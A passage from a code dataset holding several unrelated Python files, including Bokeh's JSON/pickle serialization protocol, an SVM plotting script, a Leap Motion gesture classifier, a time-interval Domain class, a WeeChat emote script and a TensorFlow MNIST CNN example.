两个属性,分别表示词和词性\n if word.flag == 'ns':\n # ns 词性表示地名\n city = word.word\n break\n\n # 返回意图命令,前两个参数必填,分别表示置信度和意图命令名\n return IntentCommand(90.0, 'weather', current_arg=city or '')\n","sub_path":"docs/guide/code/awesome-bot-7/awesome/plugins/weather/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"178365389","text":"import json\nimport logging\nimport time\nimport datetime as dt\n\nimport numpy as np\nfrom six.moves import cPickle as pickle\n\ntry:\n import pandas as pd\n is_pandas = True\nexcept ImportError as e:\n is_pandas = False\n\nlog = logging.getLogger(__name__)\n\n\"\"\"\nserialization functions for rpc server, we serialize json messages,\nas well as python data, which are lists of numpy arrays.\nmsg serialization one object -> one string\ndata serialization list of arrays -> list of buffers/strings\n\nwe have 3 protocol levels here\n1. zeromq, functions exist to separate the envelope from the payload, and\npack those up as well.\n\n2. arrayserver protocol, arrayserver messages are the payloads of zeromq messages,\nand are packaged into clientid, reqid, msgobj (json), dataobjects -\nlist data which can be serialized and deserialized\n\n3. rpc protocol, a layer around the msgobject and a data object\n\"\"\"\nmillifactor = 10 ** 6.\n\n\nclass NumpyJSONEncoder(json.JSONEncoder):\n def default(self, obj):\n if is_pandas:\n if isinstance(obj, pd.Series):\n return self.transform_list(obj.tolist())\n elif isinstance(obj, pd.tslib.Timestamp):\n return obj.value / millifactor\n if isinstance(obj, np.ndarray):\n if obj.dtype.kind == 'M':\n obj = obj.astype('datetime64[ms]').astype('int64')\n return self.transform_list(obj.tolist())\n elif isinstance(obj, np.number):\n if isinstance(obj, np.integer):\n return int(obj)\n else:\n return float(obj)\n elif isinstance(obj, (dt.datetime, dt.date)):\n return time.mktime(obj.timetuple()) * 1000.\n else:\n return super(NumpyJSONEncoder, self).default(obj)\n\n def transform_list(self, l):\n try:\n for k, v in enumerate(l):\n if isinstance(v, list):\n v = self.transform_list(v)\n elif np.isnan(v):\n l[k] = \"NaN\"\n elif np.isposinf(v):\n l[k] = \"Infinity\"\n elif np.isneginf(v):\n l[k] = \"-Infinity\"\n # If we get a type error, then there are non-numeric types\n # in the list, just bail...\n except TypeError:\n pass\n return l\n\n\ndef serialize_json(obj, encoder=NumpyJSONEncoder, **kwargs):\n return json.dumps(obj, cls=encoder, **kwargs)\n\ndeserialize_json = json.loads\n\n\ndef default_serialize_data(data):\n \"\"\"\n Parmeters\n ---------\n data : list of python objects (mostly numpy arrays)\n\n Returns\n ---------\n output : list of length 2n, where n is the number of objects.\n first item is pickled metadata, second is the data itself.\n for numpy arrays\n metadata : {'datatype' : 'numpy', 'dtype' : 'dtype', 'shape' : [2,2]}\n data : the array itself\n for arbitrary python objects\n metadata : {'datatype' : 'pickle'}\n data : pickled object\n \"\"\"\n output = []\n\n def add_numpy(d):\n metadata = {'dtype': d.dtype,\n 'shape': d.shape,\n 'datatype': 'numpy'}\n metadata = pickle.dumps(metadata)\n output.append(metadata)\n output.append(d)\n\n def add_pickle(d):\n output.append(pickle.dumps({'datatype': 'pickle'}))\n output.append(pickle.dumps(d, protocol=-1))\n\n for d in data:\n if isinstance(d, np.ndarray):\n d = np.ascontiguousarray(d)\n try:\n temp = np.frombuffer(d, dtype=d.dtype)\n except (ValueError, TypeError):\n add_pickle(d)\n continue\n add_numpy(d)\n else:\n add_pickle(d)\n\n return output\n\n\ndef default_deserialize_data(input):\n \"\"\"\n Parmeters\n ---------\n input : list of strings from default_serialize_data\n\n Returns\n ---------\n output : list of python objects, mostly numpy arrays\n \"\"\"\n output = []\n curr_index = 0\n while curr_index < len(input):\n meta = pickle.loads(input[curr_index])\n if meta['datatype'] == 'numpy':\n array = np.frombuffer(input[curr_index + 1],\n dtype=meta['dtype'])\n array = array.reshape(meta['shape'])\n output.append(array)\n elif meta['datatype'] == 'pickle':\n obj = pickle.loads(input[curr_index + 1])\n output.append(obj)\n curr_index += 2\n return output\n\nserialize_web = serialize_json\n\ndeserialize_web = deserialize_json\n\n\ndef status_obj(status):\n return {'msgtype': 'status',\n 'status': status}\n\n\ndef error_obj(error_msg):\n return {\n 'msgtype': 'error',\n 'error_msg': error_msg}\n","sub_path":"bokeh/protocol.py","file_name":"protocol.py","file_ext":"py","file_size_in_byte":4749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"520637093","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import svm\n\n\nclass SVM:\n def __init__(self, p):\n self.p = p\n\n if self.p == 2:\n self.data = np.genfromtxt('data/binclassv2.txt',delimiter=',')\n else:\n self.data = np.genfromtxt('data/binclass.txt',delimiter=',')\n\n def plotDataPoints(self, x, y, posSample, negSample):\n plt.plot(x[posSample,0], x[posSample,1], 'r*')\n plt.plot(x[negSample,0], x[negSample,1], 'b*')\n\n def plotDecisionBoundary(self, clf, y, x):\n X, Y = np.meshgrid(x, y) \n Z = clf.predict(np.c_[X.ravel(), Y.ravel()])\n Z = Z.reshape(X.shape)\n plt.contour(X, Y, Z)\n\n def main(self):\n x = self.data[:,:self.data.shape[1]-1]\n y = self.data[:,self.data.shape[1]-1]\n posSample = y>0\n negSample = y<0\n x2 = np.arange(np.min(x[:,1]),np.max(x[:,1]),0.05)\n x1 = np.arange(np.min(x[:,0]),np.max(x[:,0]),0.05)\n\n clf = svm.SVC(kernel='linear', C=1)\n clf.fit(x, y)\n\n plt.xlabel('x1')\n plt.ylabel('x2')\n plt.title('SVM Part: ' + str(self.p))\n self.plotDataPoints(x, y, posSample, negSample)\n self.plotDecisionBoundary(clf, x2, x1)\n plt.savefig(\"output/svm_part_\"+str(self.p))\n plt.close()\n\n \nmodel = SVM(2)\nmodel.main()\nmodel = SVM(1)\nmodel.main()\n","sub_path":"src/svm.py","file_name":"svm.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"536326702","text":"import tensorflow as tf \r\n# tf.placeholder define the shape of the inputs\r\na = tf.placeholder('float') #Creates a symbolic variable a \r\nb = tf.placeholder('float') #Creates a symbolic variable b\r\n\r\ny =tf.mul(a,b) #multiply the symbollic variables \r\n\r\nwith tf.Session() as sess: #creates a session to evalute the symbolic expressions\r\n\t\r\n\tprint(\"%f should equal to 2.0\" % sess.run(y,feed_dict={a:1,b:2})) #we define the values of a and b in the feed_dict it can have any number of values\r\n\tprint(\"%f should be equal to 100\" % sess.run(y,feed_dict={a:10,b:10}))\r\n\r\n","sub_path":"tfmultiply.py","file_name":"tfmultiply.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"502552358","text":"from project.code import general_functions as fun\nfrom sklearn.manifold import TSNE, MDS\nimport numpy as np\n\nimport project.code.quality_assesment.reconstruction_error as er\n\n\nclass Reduction:\n\n def __init__(self, method, seed=2, labels=None, plot=True):\n self.path_to_file = 'project/resources/'\n self.path_to_results = 'project/results/'\n self.currentFile = 'DM - D_PP - p_min 3 - delta 0.5 - q1 -5 - q2 -0.5.csv'\n self.custom_labels = False\n self.labels = labels\n self.seed = seed\n self.method = method\n self.plot = plot\n\n def run(self):\n mat, labels = fun.readMatrix(self.path_to_file + self.currentFile)\n if self.custom_labels:\n labels = self.labels\n mat = np.array(mat, dtype=np.float64)\n seed = np.random.RandomState(seed=self.seed)\n # MAGIA\n if self.method == 'sne':\n X = TSNE(n_components=2, random_state=seed, metric='precomputed').fit_transform(mat)\n elif self.method == 'mds':\n embedding = MDS(n_components=2, metric=False, max_iter=3000, eps=1e-12,\n dissimilarity=\"precomputed\", random_state=seed, n_jobs=1,\n n_init=1)\n\n X = embedding.fit_transform(mat)\n\n if self.plot:\n plt = fun.plot(labels, X)\n\n # plt.savefig(self.path_to_results + 't-sne.png')\n print('Error: ', str(er.error(mat, X)) + '%')\n\n return X\n","sub_path":"project/code/dimensonality_reduction/Reduction.py","file_name":"Reduction.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"563538580","text":"from PyQt5 import QtCore\nfrom PyQt5.QtWidgets import QFrame, QApplication, QMainWindow\nfrom resources.teacherUIPY.teacherInfo_frame1 import Ui_Frame\nfrom CommonHelper import CommonHelper\nimport sys\n\n\nclass teacherInfo_view(QFrame, Ui_Frame):\n\n def __init__(self):\n # setup UI\n super(teacherInfo_view, self).__init__()\n self.setupUi(self)\n\n\n# test code\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n\n mainWindow = QMainWindow()\n mainWindow.resize(1000,500)\n\n frame1 = QFrame(mainWindow)\n frame1.setGeometry(QtCore.QRect(400, 30, 300, 400))\n\n test = teacherInfo_view()\n test.setupUi(frame1)\n\n mainWindow.show()\n CommonHelper.readQSS(\"resources/qss/sessionFrameView.qss\",app)\n sys.exit(app.exec_())","sub_path":"coding/GRP17-master-formal-version/teacherInfo_View.py","file_name":"teacherInfo_View.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"524256631","text":"import datetime\nfrom infinity import inf\nfrom collections import Iterable\n\nimport intervals\nimport sortedcontainers\n\nfrom . import utils\nfrom .base import Booga\n\n\nclass Domain(object):\n \"\"\"Initialize with:\n\n >>> Domain(1, 4)\n >>> Domain([1, 4])\n >>> Domain((1, 4))\n >>> Domain([[1, 4]])\n >>> Domain([(1, 4)])\n >>> Domain((1, 4), (5, 8))\n >>> Domain([1, 4], [5, 8])\n >>> Domain([(1, 4), (5, 8)])\n >>> Domain([[1, 4], [5, 8]])\n\n Domain has to be closed intervals. It can be open toward -inf or\n inf. For example, Domain(-inf, 3) means a domain from -inf to 3\n inclusive.\n\n \"\"\"\n @staticmethod\n def _is_empty(args):\n if len(args) == 0:\n return [(-inf, inf)]\n\n @staticmethod\n def _is_none(args):\n if len(args) == 1 and args[0] is None:\n return [(-inf, inf)]\n\n @staticmethod\n def _is_empty_list(args):\n if len(args) == 1 and args[0] == []:\n return []\n\n @staticmethod\n def _hashable(value):\n try:\n hash(value)\n except TypeError:\n return None\n else:\n return True\n\n @staticmethod\n def _iterable(value):\n try:\n iter(value)\n except TypeError:\n return None\n else:\n return True\n\n def _valid(self, value):\n return self._hashable(value) and not self._iterable(value)\n\n def _is_pair(self, args):\n try:\n length = len(args)\n except TypeError:\n return None\n else:\n if length == 2:\n start, end = args\n if self._valid(start) and self._valid(end):\n return (start, end)\n\n def _is_single_pair(self, args):\n pair = self._is_pair(args)\n if pair:\n return [pair]\n\n def _is_unpacked_pair_list(self, args):\n pair_list = [self._is_pair(arg) for arg in args]\n if all(pair_list):\n return pair_list\n\n def _is_pair_list(self, args):\n if len(args) == 1 and isinstance(args[0], (list, tuple)):\n return self._is_unpacked_pair_list(args[0])\n\n def __init__(self, *args):\n\n validation_function_list = [\n self._is_empty,\n self._is_none,\n self._is_empty_list,\n self._is_single_pair,\n self._is_unpacked_pair_list,\n self._is_pair_list,\n ]\n for function in validation_function_list:\n interval_list = function(args)\n if interval_list is not None:\n break\n\n if not interval_list and not self._is_empty_list(args) == []:\n msg = (\n 'invalid arguments to Domain {}. Must be one of:\\n'\n ' - empty or None, e.g. Domain() or Domain(None)'\n ' - a start and end, e.g. Domain(1, 2)\\n'\n ' - a (start, end) pair, e.g. Domain([1, 2])\\n'\n ' - multiple (start, end) pairs, e.g.'\n ' e.g. Domain([1, 2], [3, 4])\\n'\n ' - a list of (start, end) pairs,'\n ' e.g. Domain([(1, 2), (3, 4)])'\n ).format(str(args))\n raise ValueError(msg)\n\n for start, end in interval_list:\n try:\n bad_order = (start >= end)\n except TypeError as error:\n raise ValueError(error)\n else:\n if bad_order:\n msg = (\n \"start of interval can't be greater or equal \"\n \"to end ({} >= {})\"\n ).format(start, end)\n raise ValueError(msg)\n\n try:\n sorted(interval_list)\n except TypeError:\n msg = \"Can't mix types\"\n raise ValueError(msg)\n\n ts_list = []\n if interval_list:\n self._start = inf\n self._end = -inf\n for start, end in interval_list:\n ts = Booga()\n ts[-inf] = False\n ts[start] = True\n ts[end] = False\n ts_list.append(ts)\n if start < self._start:\n self._start = start\n if end > self._end:\n self._end = end\n else:\n self._start = -inf\n self._end = inf\n\n if ts_list:\n self.ts = Booga.merge(ts_list, operation=any)\n else:\n self.ts = Booga()\n self.ts[-inf] = False\n\n def start(self):\n return self._start\n\n def end(self):\n return self._end\n\n @property\n def lower(self):\n return self._start\n\n @property\n def upper(self):\n return self._end\n\n def intervals(self):\n for t0, t1, value in self.ts.iterperiods(value=True):\n yield t0, t1\n\n @property\n def _interval_list(self):\n return list(self.intervals())\n\n def get_interval(self, value):\n\n # value is on the boundary of an interval\n if value in self.ts:\n is_left_value = self.ts[value]\n if is_left_value:\n left_index = self.ts._d.index(value)\n right_index = left_index + 1\n else:\n right_index = self.ts._d.index(value)\n left_index = right_index - 1\n return self.ts._d.iloc[left_index], self.ts._d.iloc[right_index]\n\n # value is inside of an interval\n elif self.ts[value]:\n right_index = self.ts._d.bisect_right(value)\n left_index = right_index - 1\n return self.ts._d.iloc[left_index], self.ts._d.iloc[right_index]\n\n # value is not in an interval\n else:\n raise KeyError(value)\n\n def n_intervals(self):\n return len(list(self.intervals()))\n\n def __contains__(self, value):\n if value in self.ts:\n return True\n else:\n return self.ts[value]\n\n def __repr__(self):\n output = '\\n'.join('{}'.format(i) for i in self.intervals())\n return '\\n{}\\n'.format(output)\n\n def union(self, *others):\n \"\"\"Union of a list of Domains. Return the Domain that is the union of\n all Domains.\n\n \"\"\"\n ts_list = [self.ts]\n ts_list.extend([d.ts for d in others])\n on = Booga.merge(ts_list, operation=any)\n return Domain([(t0, t1) for (t0, t1, v) in on.iterperiods(value=True)])\n\n def intersection(self, *others):\n \"\"\"Union of a list of Domains. Return the Domain that is the union of\n all Domains.\n\n \"\"\"\n ts_list = [self.ts]\n ts_list.extend([d.ts for d in others])\n on = Booga.merge(ts_list, operation=all)\n return Domain([(t0, t1) for (t0, t1, v) in on.iterperiods(value=True)])\n\n def slice(self, start, end):\n \"\"\"Return a segment of Domain within start and end\"\"\"\n\n if end <= start:\n message = (\n \"Can't slice a Domain when end <= start. \"\n \"Received start={} and end={}.\"\n ).format(start, end)\n raise ValueError(message)\n\n if start > self.end():\n msg = \"Start time is larger than the end of the Domain.\"\n raise ValueError(msg)\n\n if end < self.start():\n msg = \"End time is smaller than the start of the Domain.\"\n raise ValueError(msg)\n\n intervals = []\n for t0, t1, value in self.ts.iterperiods(\n start=start,\n end=end,\n value=True,\n ):\n intervals.append((t0, t1))\n\n return Domain(intervals)\n\n def __eq__(self, other):\n return list(self.intervals()) == list(other.intervals())\n\n def __ne__(self, other):\n return not(self == other)\n\n def __or__(self, other):\n \"\"\"Allow a | b syntax\"\"\"\n return self.union(other)\n\n def __and__(self, other):\n \"\"\"Allow a & b syntax\"\"\"\n return self.intersection(other)\n\n def spans_between(self, start, end, unit, n_units=1):\n previous_dt = None\n for interval_start, interval_end in self.intervals():\n\n # floor the start of the interval to start at something round\n current_dt = \\\n utils.datetime_floor(\n interval_start, unit=unit, n_units=n_units)\n\n while current_dt < interval_end:\n next_dt = current_dt + datetime.timedelta(**{unit: n_units})\n if not previous_dt == current_dt:\n yield current_dt, next_dt\n previous_dt = current_dt\n current_dt = next_dt\n","sub_path":"traces/domain.py","file_name":"domain.py","file_ext":"py","file_size_in_byte":8606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"229617672","text":"#coding: utf-8\n\nSCRIPT_NAME = \"emotes\"\nSCRIPT_AUTHOR = \"Rain\"\nSCRIPT_VERSION = \"0.1\"\nSCRIPT_LICENSE = \"MIT\"\nSCRIPT_DESC = \"Replace keywords with emotes.\"\n\nimport_ok = True\n\ntry:\n import weechat\nexcept ImportError:\n print(\"This script must be run under WeeChat.\")\n print(\"Get WeeChat now at: http://www.weechat.org/\")\n import_ok = False\n\n\ntrigger = \"$\"\n\nemotes = {\n \"flip\": \"(╯°□°)╯︵ ┻━┻\",\n \"unflip\": \"┬──┬◡ノ(° -°ノ)\",\n \"zombie\": \"(∫•…•)∫\"\n}\n\ndef my_command_mod(data, modifier, modifier_data, msg):\n for key in emotes:\n if trigger + key in msg:\n msg = msg.replace(trigger + key, emotes[key])\n return msg\n\n\nif __name__ == \"__main__\" and import_ok:\n if weechat.register(SCRIPT_NAME, SCRIPT_AUTHOR, SCRIPT_VERSION,\n SCRIPT_LICENSE, SCRIPT_DESC, \"\", \"\"):\n weechat.hook_modifier(\"irc_out1_privmsg\", \"my_command_mod\", \"\")\n\n","sub_path":"emotes.py","file_name":"emotes.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"483721756","text":"import time\nfrom string import lower, upper\n\nfrom controller import LeapIO as io\nfrom controller.LeapDataTrainer import NN_Trainer, SVM_Trainer, DT_Trainer\nimport controller.LeapFeatureExtractor as extractor\n\n# Import view libraries\nimport view.prompt.Prompter as prompter\n\n\nclass LeapDataClassifier:\n def __init__(self, acquisitor):\n self.acquisitor = acquisitor\n\n def do_classification_from_csv(self, pickle_file, train_subject, test_subject, classifier_type, gesture_set,\n feature_set, unseen_data, file_name):\n # Obtain data content of the unseen data file\n X_data_set, y_data_set = io.acquire_data_from_csv(csv_file=unseen_data)\n trainer = None\n\n # Obtain classifier type\n trainer = self.obtain_classifier(classifier_type=classifier_type, gesture_set=gesture_set,\n feature_set=feature_set, train_subject=train_subject, pickle_file=pickle_file)\n\n # Create time and classification lists\n time_list = []\n i = 0\n correct_predictions = 0\n # Do classification for each data set\n print(\"\"),\n for X_data in X_data_set:\n y_data = y_data_set[i]\n\n # Classify gestures and return results\n prediction, result, time_taken = self.classify_known_gesture(\n feature_data_set=X_data,\n feature_type=feature_set,\n chosen_gesture=y_data,\n trainer=trainer,\n verbose=False\n )\n\n time_list.append(time_taken)\n # Check if correct\n if result is True:\n correct_predictions += 1\n\n # Check if personalized\n if lower(train_subject) == lower(test_subject):\n personalized = \"personalized\"\n else:\n personalized = \"non-personalized\"\n\n print(\"\\rProgress - - - > \" + str(i) + \"/\" + str(len(X_data_set))),\n # Print regardless of verbosity\n # print(upper(personalized) + \" : \" + upper(classifier_type) +\n # \"(\" + str(trainer.training_acc) + \"%) -- Train Subject :\" + test_subject +\n # \", Test Subject : \" + test_subject + \" >> \" + gesture_set + \" - \" + feature_set + \" = \" + prediction)\n\n # Append to csv results\n io.append_classification_csv_results(personalized=personalized, classifier_type=classifier_type,\n training_score=trainer.training_acc, train_subject=test_subject,\n test_subject=train_subject, gesture_set=gesture_set,\n feature_set=feature_set, correct=result, time=time_taken,\n gesture=y_data, prediction=prediction)\n i += 1\n\n # Process corresponding results\n self.process_modified_test_results(\n classifier_type=classifier_type,\n test_subject=train_subject,\n correct_classification=correct_predictions,\n time_list=time_list,\n gesture_set=gesture_set,\n feature_set=feature_set,\n file_name=file_name,\n comparison_subject=test_subject,\n file_path=pickle_file,\n unseen_data=unseen_data,\n trainer=trainer,\n verbose=False\n )\n\n accuracy = round(float(correct_predictions)/float(len(X_data_set)), 5)\n return accuracy\n\n def do_classification_from_features(self, trainer, feature_data_set):\n # Obtain values\n value_set = []\n for feature_data in feature_data_set:\n value_set.append(feature_data.value)\n\n prediction = self.classify_unknown_gesture(feature_data_set=value_set, trainer=trainer)\n\n return prediction[0]\n\n\n def do_classification_from_hand(self, pickle_file, train_subject, classifier_type, gesture_set,\n feature_set, chosen_gesture, hand):\n # Initialize variables\n feature_data_set = None\n\n # Obtain classifier type\n trainer = self.obtain_classifier(classifier_type=classifier_type, gesture_set=gesture_set,\n feature_set=feature_set, train_subject=train_subject, pickle_file=pickle_file)\n # Acquire X data set\n if feature_set == 'finger-angle-and-palm-distance':\n feature_name, feature_data_set = extractor.extract_finger_palm_angle_distance(hand=hand)\n pass\n elif feature_set == 'finger-angle-using-bones':\n feature_name, feature_data_set = extractor.extract_finger_palm_angle(hand=hand)\n pass\n elif feature_set == 'finger-between-distance':\n feature_name, feature_data_set = extractor.extract_finger_finger_distance(hand=hand)\n pass\n elif feature_set == 'finger-to-palm-distance':\n feature_name, feature_data_set = extractor.extract_finger_palm_distance(hand=hand)\n pass\n\n # Obtain just the values\n value_set = []\n for feature_data in feature_data_set:\n value_set.append(feature_data.value)\n\n prediction, result, _ = self.classify_known_gesture(\n trainer=trainer,\n feature_type=feature_set,\n feature_data_set=value_set,\n chosen_gesture=chosen_gesture,\n verbose=False\n )\n\n return prediction, result, trainer\n\n def classify_unknown_gesture(self, feature_data_set, trainer):\n prediction = trainer.classify([feature_data_set])\n return prediction\n\n\n def classify_known_gesture(self, feature_data_set, chosen_gesture, trainer, feature_type=None, verbose=True):\n # Recording timing of classification\n start_time = round(time.time(), 8)\n prediction = trainer.classify([feature_data_set])\n end_time = round(time.time(), 8)\n\n time_taken = round(end_time - start_time, 8)\n\n # Output for user\n if (prediction[0]) == chosen_gesture:\n if verbose is True:\n print(\"- - - - - CORRECT PREDICTION - - - - -\")\n result = True\n else:\n if verbose is True:\n print(\"+ + + + + INCORRECT PREDICTION + + + + +\")\n result = False\n\n if verbose is True and feature_type is not None:\n print(\"Feature Used : \" + feature_type)\n print(\"Prediction : \" + lower(prediction[0]))\n print(\"Time Taken : \" + str(time_taken) + \"\\n\")\n\n return prediction[0], result, time_taken\n\n def obtain_classifier(self, classifier_type, pickle_file, train_subject, feature_set, gesture_set):\n trainer = None\n # Obtain classifier type\n if lower(classifier_type) == 'nn':\n # Get set hyper parameters\n activation = pickle_file.split(\".\")[0].split(\"--\")[1].split(\"_\")[1]\n # Get NN Trainer\n trainer = NN_Trainer(subject_name=train_subject, feature_type=feature_set, activation=activation,\n gesture_set=gesture_set)\n trainer.load(pickle_name=pickle_file)\n pass\n elif lower(classifier_type) == 'svm':\n # Get set hyper parameters\n kernel_type = pickle_file.split(\".\")[0].split(\"--\")[1].split(\"_\")[1]\n # Get SVM Trainer\n trainer = SVM_Trainer(subject_name=train_subject, feature_type=feature_set, kernel_type=kernel_type,\n gesture_set=gesture_set)\n trainer.load(pickle_name=pickle_file)\n elif lower(classifier_type) == 'dt':\n # Get set hyper parameters\n criterion_type = pickle_file.split(\".\")[0].split(\"--\")[1].split(\"_\")[1]\n # Get NN Trainer\n trainer = DT_Trainer(subject_name=train_subject, feature_type=feature_set, criterion_type=criterion_type,\n gesture_set=gesture_set)\n trainer.load(pickle_name=pickle_file)\n\n return trainer\n\n def process_modified_test_results(self, comparison_subject, test_subject, classifier_type, correct_classification,\n time_list, trainer,\n gesture_set, feature_set, file_name, file_path, unseen_data,\n verbose=False):\n # Calculate average time taken to perform classification algorithms between multiple test hand instances\n avg_time = (sum(time_list)) / (len(time_list))\n # Calculate average accuracy of classification algorithm between multiple test hand instances\n accuracy = round(100.0 * (float(correct_classification) / (float(len(time_list)))), 2)\n\n train_accuracy = round(trainer.training_acc * 100.0, 3)\n\n # Get pickle file name without folders\n pickle_file = file_path.split(\"\\\\\")[-1].split(\".\")[0]\n unseen_data = unseen_data.split(\"\\\\\")[-1].split(\".\")[0]\n if test_subject == comparison_subject:\n title = \"PERSONALIZED TEST\"\n else:\n title = \"NON-PERSONALIZED TEST\"\n\n summary = \"\"\"\n\n__________________________________________________________________________________________________\nTest Subject Pickle : %s \nUnseen Subject Data : %s\n__________________________________________________________________________________________________\n %s \n--------------------------------------------------------------------------------------------------\n Subject : %s\n Unseen Subject : %s\n Feature : %s\n Gesture Set : %s\n Correct : %s\n Incorrect : %s\n Result : %s / %s\n Avg Time : %s seconds\n \n TRAINING \n Accuracy : %s %%\n \n TESTING\n Accuracy : %s %%\n \n \\n\"\"\" % (pickle_file,\n unseen_data,\n title,\n test_subject,\n comparison_subject,\n feature_set,\n gesture_set,\n str(correct_classification),\n str(len(time_list) - correct_classification),\n str(correct_classification),\n str(len(time_list)),\n str(avg_time),\n str(train_accuracy),\n str(accuracy),\n )\n\n # Print out results in summary form\n if verbose is True:\n print(summary)\n pass\n # Save summary onto report file\n return io.save_report(subject_name=test_subject, gesture_set=gesture_set, feature_set=feature_set,\n report_header='classification', classifier_type=classifier_type, line=summary,\n file_name=file_name)\n","sub_path":"src/controller/LeapDataClassifier.py","file_name":"LeapDataClassifier.py","file_ext":"py","file_size_in_byte":10921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"426010015","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"使用CNN对MNIST数据集进行分类\n\n@author: winton \n@time: 2017-10-26 16:43 \n\"\"\"\nimport os\nimport sys\n\nimport gflags\n\nimport photinia\nimport tensorflow as tf\n\nfrom examples import mnist\n\n\nclass Model(photinia.Model):\n \"\"\"模型定义\n \"\"\"\n\n def __init__(self,\n name,\n session,\n height,\n width,\n depth,\n feature_size,\n num_classes):\n \"\"\"模型初始化\n\n :param name: 模型名\n :param session: 使用的tensorflow会话\n :param height: 图片高度\n :param width: 图片宽度\n :param depth: 图片通道数\n :param feature_size: 全连接层输出维度\n :param num_classes: 类别数\n \"\"\"\n self._height = height\n self._width = width\n self._depth = depth\n self._feature_size = feature_size\n self._num_classes = num_classes\n super().__init__(name, session)\n\n def _build(self):\n # 网络模块定义 --- build\n self._cnn = photinia.CNN('CNN',\n input_height=self._height,\n input_width=self._width,\n input_depth=1,\n layer_shapes=[(5, 5, 32, 2, 2),\n (5, 5, 64, 2, 2)],\n activation=tf.nn.relu,\n with_batch_norm=False\n ).build()\n self._lin1 = photinia.Linear('LINEAR1', self._cnn.flat_size, self._feature_size)\n self._lin2 = photinia.Linear('LINEAR2', self._feature_size, self._num_classes)\n # dropout参数\n keep_prob = tf.placeholder(dtype=photinia.dtype)\n # ��入\n x = tf.placeholder(dtype=photinia.dtype, shape=[None, self._height, self._width, self._depth])\n y_ = tf.placeholder(dtype=photinia.dtype, shape=[None, self._num_classes])\n # 网络结构定义 --- setup\n y = self._cnn.setup(x)\n y = self._lin1.setup(y)\n y = tf.nn.dropout(y, keep_prob)\n y = self._lin2.setup(y)\n # 损失函数定义, softmax交叉熵函数\n loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y_, logits=y))\n # accuracy计算\n correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, photinia.dtype))\n # 设置训练和预测的slot\n self._add_slot(\n 'train',\n outputs=(loss, accuracy),\n inputs=(x, y_, keep_prob),\n updates=tf.train.AdamOptimizer(1e-4).minimize(loss)\n )\n self._add_slot(\n 'predict',\n outputs=accuracy,\n inputs=(x, y_, keep_prob)\n )\n\n\ndef main(flags):\n # 创建数据源对象\n ds = mnist.Data(flags.directory)\n # tensorflow 配置\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n # 开始session\n with tf.Session(config=config) as session:\n # 创建模型对象\n model = Model('Model',\n session,\n flags.height,\n flags.width,\n flags.depth,\n flags.feature_size,\n flags.num_classes)\n # 获取slot\n train = model.get_slot('train')\n predict = model.get_slot('predict')\n # 参数初始化\n session.run(tf.global_variables_initializer())\n # 开始训练\n for i in range(1, flags.nloop + 1):\n # 获取一个batch的数据\n images_batch, labels_batch = ds.next_batch(flags.bsize)\n loss, train_accuracy = train(images_batch, labels_batch, 0.5)\n # 每100次迭代输出训练交叉熵损失以batch上的accuracy\n if i % 100 == 0:\n print('Loop {}:\\tloss={}\\ttrain accuracy={}'.format(i, loss, train_accuracy))\n # 输出在测试集上的accuracy\n accuracy = predict(ds.test_images, ds.test_labels, 1.0)\n print('Accuracy on test set: {}'.format(accuracy))\n return 0\n\n\nif __name__ == '__main__':\n global_flags = gflags.FLAGS\n gflags.DEFINE_boolean('help', False, 'Show this help.')\n gflags.DEFINE_string('gpu', '0', 'Which GPU to use.')\n gflags.DEFINE_string('directory', './examples', 'Folder to save the origin data.')\n gflags.DEFINE_integer('height', 28, 'Height of image.')\n gflags.DEFINE_integer('width', 28, 'Width of image.')\n gflags.DEFINE_integer('depth', 1, 'Depth of image.')\n gflags.DEFINE_integer('feature_size', 1024, 'Output dimension of fully-connected layer .')\n gflags.DEFINE_integer('num_classes', 10, 'Number of classes.')\n gflags.DEFINE_integer('nloop', 20000, 'Number of loops.')\n gflags.DEFINE_integer('bsize', 50, 'Batch size.')\n global_flags(sys.argv)\n if global_flags.help:\n print(global_flags.main_module_help())\n exit(0)\n os.environ['CUDA_VISIBLE_DEVICES'] = global_flags.gpu\n exit(main(global_flags))\n","sub_path":"examples/mnist_deep.py","file_name":"mnist_deep.py","file_ext":"py","file_size_in_byte":5174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"194605771","text":"\"\"\"\nPE19 Mamy listę moja_lista = [-2, 4, -1, 66, 5, 0, -1]\nchcemy mieć nową listę\ntaką, że jeśli element jest mniejszy niż 0 to dodamy do niego 5\na jeśli jest większy równy 0 to dodamy do niego 100\n\"\"\"\n\nmoja_lista = [-2, 4, -1, 66, 5, 0, -1]\n\nnowa_lista = [x + 5 if x < 0 else x + 100 for x in moja_lista]\n\nprint(nowa_lista)\n","sub_path":"a/petle_listy/PE19.py","file_name":"PE19.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"310610841","text":"import os\n\n# 站点URL\nURL = 'http://www.peersafe.cn/index.html'\n\n# 